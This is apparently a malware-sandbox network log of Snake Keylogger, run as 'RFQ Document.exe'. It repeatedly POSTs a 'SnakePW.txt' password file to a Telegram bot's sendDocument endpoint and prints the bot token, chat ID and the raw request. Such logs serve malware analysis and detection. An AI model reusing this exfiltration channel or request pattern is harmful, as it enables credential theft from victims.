2021-09-28 05:58:21 UTC	4	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 33 33 31 39 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c23319c3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:21 UTC	5	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:21 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:21 UTC	5	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12582,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49804	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:26 UTC	47	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c57a55a2 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:26 UTC	48	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 35 37 61 35 35 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c57a55a2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:26 UTC	48	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:26 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:26 UTC	48	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 36 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12610,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808706,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
300	192.168.2.4	50137	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	478	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f65a7c41 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	478	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 35 61 37 63 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f65a7c41Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:48 UTC	478	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:48 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:48 UTC	479	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12890,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808788,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
301	192.168.2.4	50138	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:48 UTC	479	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6725283 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:48 UTC	480	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 37 32 35 32 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6725283Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:49 UTC	480	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	480	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12891,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
302	192.168.2.4	50139	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	481	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f68a2bcb Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	481	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 38 61 32 62 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f68a2bcbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:49 UTC	482	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	482	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12892,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
303	192.168.2.4	50140	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	482	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6a6c7a7 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	483	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 61 36 63 37 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6a6c7a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:49 UTC	483	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	484	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12893,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
304	192.168.2.4	50141	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	484	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6be9e54 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	484	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 62 65 39 65 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6be9e54Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:49 UTC	485	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:49 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:49 UTC	485	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12894,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808789,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
305	192.168.2.4	50142	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:49 UTC	486	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f6d67670 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:49 UTC	486	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 36 64 36 37 36 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f6d67670Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
